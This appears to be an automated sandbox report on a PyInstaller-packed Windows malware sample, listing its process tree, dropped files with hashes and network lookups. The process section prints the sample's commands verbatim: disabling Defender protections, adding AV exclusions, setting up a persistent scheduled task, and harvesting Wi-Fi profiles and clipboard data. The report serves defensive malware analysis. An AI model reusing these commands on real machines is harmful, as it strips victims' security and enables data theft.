Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\XClient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\SoundPad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Gorillatag client.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4628 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\SoundPad.exe
PID 4628 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\SoundPad.exe
PID 4628 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\XClient.exe
PID 4628 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\XClient.exe
PID 4688 wrote to memory of 4984 N/A C:\Users\Admin\SoundPad.exe C:\Users\Admin\SoundPad.exe
PID 4688 wrote to memory of 4984 N/A C:\Users\Admin\SoundPad.exe C:\Users\Admin\SoundPad.exe
PID 2072 wrote to memory of 4500 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 4500 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 2868 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4984 wrote to memory of 2868 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 3176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2868 wrote to memory of 3176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4984 wrote to memory of 2032 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4984 wrote to memory of 2032 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 2032 wrote to memory of 2832 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2032 wrote to memory of 2832 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 3828 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 3828 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 2776 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4984 wrote to memory of 2776 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 2776 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 4940 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 4940 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 2608 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 2608 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2072 wrote to memory of 4844 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\schtasks.exe
PID 2072 wrote to memory of 4844 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Output.exe

"C:\Users\Admin\AppData\Local\Temp\Output.exe"

C:\Users\Admin\SoundPad.exe

"C:\Users\Admin\SoundPad.exe"

C:\Users\Admin\XClient.exe

"C:\Users\Admin\XClient.exe"

C:\Users\Admin\SoundPad.exe

"C:\Users\Admin\SoundPad.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClient.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Gorillatag client.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Gorillatag client.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Gorillatag client" /tr "C:\Users\Admin\Gorillatag client.exe"

C:\Users\Admin\Gorillatag client.exe

"C:\Users\Admin\Gorillatag client.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 19.ip.gl.ply.gg udp

Files

memory/4628-0-0x00007FFB19510000-0x00007FFB19FD2000-memory.dmp

memory/4628-1-0x0000000000A70000-0x0000000001A72000-memory.dmp

C:\Users\Admin\SoundPad.exe

MD5 3b184b0bf9cae37d5a3f0025c43791f9
SHA1 4d384b79ec9bbef8cbc3ad85ee49914dca03888c
SHA256 b13f82bc8c09dd45d7cc4026ff2b9bb16ec302eef90bdb22e66bd8c9287b695f
SHA512 5d5e7030f49dff50933c1438f38c7dbdfd1e95b0e8155b4f16b2f6a205c6feff440c92588f0440ed543577dc2f25eabacd39730937a83615e01b5e798a19d51c

C:\Users\Admin\XClient.exe

MD5 b8a5902712f0159c808d05982f3f099f
SHA1 b5bc99d9f751a6d8618453761f6f1db7eb4ead59
SHA256 0325350841de44656ec17462500221ce09a1fd617cb56d1770a1ca6490b03713
SHA512 2b832adeadd64f094e7b83a29309636d4f2e8e2f8bdc9c798591d0f03874e7b02a0d26e940f8ceb709517be4d9ae771f12a7bab89b9c86f14d0229a7128a3d4d

memory/2072-100-0x00007FFB19510000-0x00007FFB19FD2000-memory.dmp

memory/2072-110-0x0000000000370000-0x0000000000386000-memory.dmp

memory/4628-108-0x00007FFB19510000-0x00007FFB19FD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI46882\python312.dll

MD5 2889fb28cd8f2f32997be99eb81fd7eb
SHA1 adfeb3a08d20e22dde67b60869c93291ca688093
SHA256 435430e3abfde589d8535bc24a4b1d4147a4971dbe59e9377603974c07a1b637
SHA512 aaa33b8178a8831008ea6ad39b05189d55aa228a20a2315e45df6e2ff590c94478cfc76c9adb762689edb021ecdf98df3e7074d8d65c1c477273056b7509f8ee

C:\Users\Admin\AppData\Local\Temp\_MEI46882\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/4984-146-0x00007FFB15580000-0x00007FFB15C59000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_ctypes.pyd

MD5 76288ffffdce92111c79636f71b9bc9d
SHA1 15c10dcd31dab89522bf5b790e912dc7e6b3183b
SHA256 192cc2ac818c78cd21e9f969a95c0ff777d4cd5f79ae51ab7c366d2b8540f6a1
SHA512 29efc143cd72bf886e9bf54463706484f22222f024bd7e8cb206c32f40b76d823efd36061b05bbd6bcf562f83d95449acb3f1440c95e63750c643c15a10816c9

C:\Users\Admin\AppData\Local\Temp\_MEI46882\python3.dll

MD5 6271a2fe61978ca93e60588b6b63deb2
SHA1 be26455750789083865fe91e2b7a1ba1b457efb8
SHA256 a59487ea2c8723277f4579067248836b216a801c2152efb19afee4ac9785d6fb
SHA512 8c32bcb500a94ff47f5ef476ae65d3b677938ebee26e80350f28604aaee20b044a5d55442e94a11ccd9962f34d22610b932ac9d328197cf4d2ffbc7df640efba

C:\Users\Admin\AppData\Local\Temp\_MEI46882\base_library.zip

MD5 630153ac2b37b16b8c5b0dbb69a3b9d6
SHA1 f901cd701fe081489b45d18157b4a15c83943d9d
SHA256 ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2
SHA512 7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41

C:\Users\Admin\AppData\Local\Temp\_MEI46882\libffi-8.dll

MD5 bb1feaa818eba7757ada3d06f5c57557
SHA1 f2de5f06dc6884166de165d34ef2b029bb0acf8b
SHA256 a7ac89b42d203ad40bad636ad610cf9f6da02128e5a20b8b4420530a35a4fb29
SHA512 95dd1f0c482b0b0190e561bc08fe58db39fd8bb879a2dec0cabd40d78773161eb76441a9b1230399e3add602685d0617c092fff8bf0ab6903b537a9382782a97

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_bz2.pyd

MD5 f991618bfd497e87441d2628c39ea413
SHA1 98819134d64f44f83a18985c2ec1e9ee8b949290
SHA256 333c06fad79094d43465d128d68078296c925d1ea2b6b5bf13072a8d5cb65e7e
SHA512 3a9ecb293abedcdba3493feb7d19f987735ced5a5194abaa1d1e00946e7ea0f878dd71868eb3d9bfec80432df862367661b825c9e71409c60ec73d1708a63ef6

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_lzma.pyd

MD5 f07f0cfe4bc118aebcde63740635a565
SHA1 44ee88102830434bb9245934d6d4456c77c7b649
SHA256 cc5302895aa164d5667d0df3ebeeee804384889b01d38182b3f7179f3c4ff8c0
SHA512 fcd701903ccd454a661c27835b53f738d947f38e9d67620f52f12781a293e42ae6b96c260600396883d95dd5f536dba2874aaee083adbcc78d66873cefc8e99d

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_uuid.pyd

MD5 7a00ff38d376abaaa1394a4080a6305b
SHA1 d43a9e3aa3114e7fc85c851c9791e839b3a0ee13
SHA256 720e9b68c41c8d9157865e4dd243fb1731f627f3af29c43250804a5995a82016
SHA512 ce39452df539eeeff390f260c062a0c902557fda25a7be9a58274675b82b30bddb7737b242e525f7d501db286f4873b901d94e1cd09aa8864f052594f4b34789

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_wmi.pyd

MD5 f3767430bbc7664d719e864759b806e4
SHA1 f27d26e99141f15776177756de303e83422f7d07
SHA256 787caad25cb4e2df023ead5e5a3fcd160b1c59a2e4ae1fc7b25c5087964defe8
SHA512 b587dfff4ba86142663de6ef8710ac7ab8831ca5fc989820b6a197bcd31ac5fdcb0b5982bf9a1fc13b331d0e53dc1b7367b54bb47910f3d1e18f8193449acb9c

C:\Users\Admin\AppData\Local\Temp\_MEI46882\select.pyd

MD5 c16b7b88792826c2238d3cf28ce773dd
SHA1 198b5d424a66c85e2c07e531242c52619d932afa
SHA256 b81be8cc053734f317ff4de3476dd8c383cc65fe3f2f1e193a20181f9ead3747
SHA512 7b1b2494fe0ef71869072d3c41ba1f2b67e3b9dcc36603d1503bb914d8b8e803dc1b66a3cbf0e45c43e4a5b7a8f44504a35d5e8e1090d857b28b7eba1b89c08a

memory/4984-187-0x00007FFB2AAB0000-0x00007FFB2AABD000-memory.dmp

memory/4984-186-0x00007FFB2B430000-0x00007FFB2B449000-memory.dmp

memory/4984-185-0x00007FFB2B7A0000-0x00007FFB2B7AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_socket.pyd

MD5 7e92d1817e81cbafdbe29f8bec91a271
SHA1 08868b9895196f194b2e054c04edccf1a4b69524
SHA256 19573ccc379190277674a013f35bf055f6dbb57adfce79152152a0de3ff8c87c
SHA512 0ed41a3ce83b8f4a492555a41881d292ece61d544f0a4df282f3cc37822255a7a32647724568c9a3b04d13fd3cc93eb080e54ac2ce7705b6b470454366be1cbe

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_ssl.pyd

MD5 8696f07039706f2e444f83bb05a65659
SHA1 6c6fff6770a757e7c4b22e6e22982317727bf65b
SHA256 5405af77bc6ad0c598490b666c599c625195f7bf2a63db83632e3a416c73e371
SHA512 93e9f8fc1ae8a458eb4d9e7d7294b5c2230cb753386842e72d07cb7f43f248d204d13d93aedae95ec1a7aa6a81a7c09fdba56a0bc31924a1722c423473d97758

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_sqlite3.pyd

MD5 29a6551e9b7735a4cb4a61c86f4eb66c
SHA1 f552a610d64a181b675c70c3b730aa746e1612d0
SHA256 78c29a6479a0a2741920937d13d404e0c69d21f6bd76bdfec5d415857391b517
SHA512 54a322bfe5e34f0b6b713e22df312cfbde4a2b52240a920b2fa3347939cf2a1fecbeac44d7c1fa2355ee6dc714891acd3ee827d73131fd1e39fba390c3a444e6

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_queue.pyd

MD5 8347192a8c190895ec8806a3291e70d9
SHA1 0a634f4bd15b7ce719d91f0c1332e621f90d3f83
SHA256 b1ad27547e8f7ab2d1ce829ca9bdcc2b332dc5c2ef4fe224ccb76c78821c7a19
SHA512 de6858ed68982844c405ca8aecf5a0aa62127807b783a154ba5d844b44f0f8f42828dc097ac4d0d1aa8366cdcab44b314effcb0020b65db4657df83b1b8f5fed

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_overlapped.pyd

MD5 ed9cff0d68ba23aad53c3a5791668e8d
SHA1 a38c9886d0de7224e36516467803c66a2e71c7d9
SHA256 e88452d26499f51d48fe4b6bd95fc782bad809f0cb009d249aacf688b9a4e43f
SHA512 6020f886702d9ff6530b1f0dad548db6ad34171a1eb677cb1ba14d9a8943664934d0cfe68b642b1dd942a70e3ae375071591a66b709c90bd8a13303a54d2198b

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_multiprocessing.pyd

MD5 0c942dacb385235a97e373bdbe8a1a5e
SHA1 cf864c004d710525f2cf1bec9c19ddf28984ca72
SHA256 d5161d4e260b2bb498f917307f1c21381d738833efc6e8008f2ebfb9447c583b
SHA512 ca10c6842634cec3cada209b61dd5b60d8ea63722e3a77aa05e8c61f64b1564febe9612b554a469927dbce877b6c29c357b099e81fa7e73ceeae04b8998aa5a5

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_hashlib.pyd

MD5 caaea46ee25211cbdc762feb95dc1e4d
SHA1 1f900cc99c02f4300d65628c1b22ddf8f39a94d4
SHA256 3ef6e0e5bf3f1ea9713f534c496a96eded9d3394a64324b046a61222dab5073b
SHA512 68c2b1634fcca930c1651f550494a2ef187cf52dce8ff28f410ebed4d84487e3b08f6f70223a83b5313c564dcd293748f3c22f2a4218218e634e924c8390cf9a

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_decimal.pyd

MD5 c2f5d61323fb7d08f90231300658c299
SHA1 a6b15204980e28fc660b5a23194348e6aded83fc
SHA256 a8ea1e613149d04e7ce637413aad6df636556916902718f64e57fdff44f959bb
SHA512 df22676b5268175562574078459820f11eedb06f2845c86398c54861e9e3fb92547e7341b497fb0e79e9d3abba655e6593b1049bf78818c0ba7b9c96e3748606

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_cffi_backend.cp312-win_amd64.pyd

MD5 886da52cb1d06bd17acbd5c29355a3f5
SHA1 45dee87aefb1300ec51f612c3b2a204874be6f28
SHA256 770d04ebe9f4d8271659ba9bf186b8ae422fdd76f7293dbc84be78d9d6dd92cc
SHA512 d6c7a90b8fa017f72f499943d73e4015f2eec0e46188c27848892a99be35e0ecbda1f692630863b89109b04636e813ddad2051f323a24b4d373192a6b67cf978

C:\Users\Admin\AppData\Local\Temp\_MEI46882\_asyncio.pyd

MD5 b72e9a2f4d4389175e96cd4086b27aac
SHA1 2acfa17bb063ee9cf36fadbac802e95551d70d85
SHA256 f9924bbead1aca98422ba421f5139a4c147559aae5928dfd2f6aada20cb6bb42
SHA512 b55f40451fa9bdd62c761823613fcfe734aaa28e26fb02a9620ad39ab7539c9257eac8cc10d4a3f2390c23a4d951cc02d695498530a4c1d91b4e51e625316e06

C:\Users\Admin\AppData\Local\Temp\_MEI46882\VCRUNTIME140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\_MEI46882\unicodedata.pyd

MD5 4253cde4d54e752ae54ff45217361471
SHA1 06aa069c348b10158d2412f473c243b24d6fc7bc
SHA256 67634e2df60da6b457e4ebfbae3edb1f48d87752221600a5814b5e8f351166e6
SHA512 3b714a57747eddf39fc3a84ab3ca37cc0b8103dd3f987331ffb2d1d46f9a34f3793bb0493c55e02ab873314c8990eaebdd0284ad087a651c06a7f862b1a61c80

C:\Users\Admin\AppData\Local\Temp\_MEI46882\sqlite3.dll

MD5 8776a7f72e38d2ee7693c61009835b0c
SHA1 677a127c04ef890e372d70adc2ab388134753d41
SHA256 c467fcc7377b4a176e8963f54ffff5c96d1eb86d95c4df839af070d6d7dbf954
SHA512 815bf905fa9a66c05e5c92506d2661c87559c6205c71daa205368dbfd3d56b8a302a4d31729bc6d4c1d86cbcf057638aa17bde0d85ccc59ce1cbcb9e64349732

C:\Users\Admin\AppData\Local\Temp\_MEI46882\pyexpat.pyd

MD5 edcb8f65306461e42065ac6fc3bae5e7
SHA1 4faa04375c3d2c2203be831995403e977f1141eb
SHA256 1299da117c98d741e31c8fb117b0f65ae039a4122934a93d0bbb8dfbddd2dcd7
SHA512 221e6e1eb9065f54a48040b48f7b6109853306f04506ccf9ecb2f5813a5bd9675c38565a59e72770bf33d132977aa1558cc290720e39a4f3a74a0e7c2a3f88fa

C:\Users\Admin\AppData\Local\Temp\_MEI46882\libssl-3.dll

MD5 9b8d3341e1866178f8cecf3d5a416ac8
SHA1 8f2725b78795237568905f1a9cd763a001826e86
SHA256 85dd8c17928e78c20cf915c1985659fe99088239793f2bd46acb31a3c344c559
SHA512 815abc0517f94982fc402480bba6e0749f44150765e7f8975e4fcbfce62c4a5ff741e39e462d66b64ba3b804bd5b7190b67fff037d11bb314c7d581cfa6097a8

C:\Users\Admin\AppData\Local\Temp\_MEI46882\libcrypto-3.dll

MD5 e68a459f00b05b0bd7eafe3da4744aa9
SHA1 41565d2cc2daedd148eeae0c57acd385a6a74254
SHA256 3fcf6956df6f5dc92b2519062b40475b94786184388540a0353f8a0868413648
SHA512 6c4f3747af7be340a3db91e906b949684a39cafc07f42b9fcc27116f4f4bf405583fc0db3684312b277d000d8e6a566db2c43601fa2af499700319c660ef1108

memory/4984-162-0x00007FFB2A770000-0x00007FFB2A79D000-memory.dmp

memory/4984-161-0x00007FFB2B7C0000-0x00007FFB2B7D9000-memory.dmp

memory/4984-159-0x00007FFB2E240000-0x00007FFB2E24F000-memory.dmp

memory/4984-158-0x00007FFB2AAC0000-0x00007FFB2AAE5000-memory.dmp

memory/4984-189-0x00007FFB2B470000-0x00007FFB2B47D000-memory.dmp

memory/4984-191-0x00007FFB2A730000-0x00007FFB2A763000-memory.dmp

memory/4984-195-0x00007FFB16300000-0x00007FFB163CD000-memory.dmp

memory/4984-197-0x000001BFB6A90000-0x000001BFB6FB9000-memory.dmp

memory/4984-196-0x00007FFB15050000-0x00007FFB15579000-memory.dmp

memory/4984-202-0x00007FFB2A660000-0x00007FFB2A672000-memory.dmp

memory/4984-201-0x00007FFB2A710000-0x00007FFB2A726000-memory.dmp

memory/4984-207-0x00007FFB14ED0000-0x00007FFB15046000-memory.dmp

memory/2072-210-0x00007FFB19510000-0x00007FFB19FD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI46882\psutil\_psutil_windows.pyd

MD5 d2ab09582b4c649abf814cdce5d34701
SHA1 b7a3ebd6ff94710cf527baf0bb920b42d4055649
SHA256 571115cca942bc76010b379df5d28afcb0f0d0de65a3bac89a95c6a86838b983
SHA512 022ccaeb99dc08997d917f85c6bc3aefdad5074c995008942a2f35f46ba07d73bb5bc7bc971ec71cb0e60dcb096b2c990866fe29c57670d069e7bdc3b14f6172

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyeuz05c.ybq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\_MEI46882\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

MD5 4e5cd67d83f5226410ef9f5bc6fddab9
SHA1 dd75f79986808ff22f1049680f848a547ba7ab84
SHA256 80645609f9a48a8aaf988fa667f5aa32445e32f8027f61b27884d738ad608ae4
SHA512 e52eb7b51562a336c73c6b5b8a1ae821a7c2ad0145633858fc78d6af1a27d8f57ba59cfffa84a376f59d5362a19a7cc09fa1f691c7b50b3ac27c439781a42ba0

memory/4984-231-0x00007FFB12700000-0x00007FFB1281B000-memory.dmp

memory/4984-230-0x00007FFB1A0C0000-0x00007FFB1A0E7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI46882\Cryptodome\Cipher\_raw_ecb.pyd

MD5 1a48e6e2a3243a0e38996e61f9f61a68
SHA1 488a1aa38cd3c068bdf24b96234a12232007616c
SHA256 c7b01a0290bc43910ee776bd90de05e37b77f5bd33feaf7d38f4c362e255e061
SHA512 d7acd779b7cab5577289511f137dc664966fcaac39748e33ca4d266a785b17766106944df21c8f2452fd28e008529f3e0097282ad3c69f1069a93df25c6da764

C:\Users\Admin\AppData\Local\Temp\_MEI46882\Cryptodome\Cipher\_raw_cbc.pyd

MD5 e0dd54d1a4a8b3f4a2b7fb67bc2e6297
SHA1 b184c2ed3dd46d527df992ffe0c57ef8eb364eea
SHA256 b6b7cce003744af2342afef0f2536cdbbccd3a271f15f72aefc740332312281e
SHA512 960f3e6e3a6168ba65d690cb9c94541de8f5a8afb456b5db8d7c0392d0d935cf47245eb88160606be12d54c32f1dc1e1ebf7c6049a310654847e0d473d1726a6

memory/4984-229-0x00007FFB2AAA0000-0x00007FFB2AAAB000-memory.dmp

memory/4984-249-0x00007FFB11DC0000-0x00007FFB11DCD000-memory.dmp

memory/4984-248-0x00007FFB11DD0000-0x00007FFB11DDC000-memory.dmp

memory/4984-247-0x00007FFB126E0000-0x00007FFB126EC000-memory.dmp

memory/4984-246-0x00007FFB126F0000-0x00007FFB126FB000-memory.dmp

memory/4984-245-0x00007FFB12A90000-0x00007FFB12A9B000-memory.dmp

memory/4984-244-0x00007FFB12AA0000-0x00007FFB12AAC000-memory.dmp

memory/4984-243-0x00007FFB12AB0000-0x00007FFB12ABE000-memory.dmp

memory/4984-242-0x00007FFB15C60000-0x00007FFB15C6C000-memory.dmp

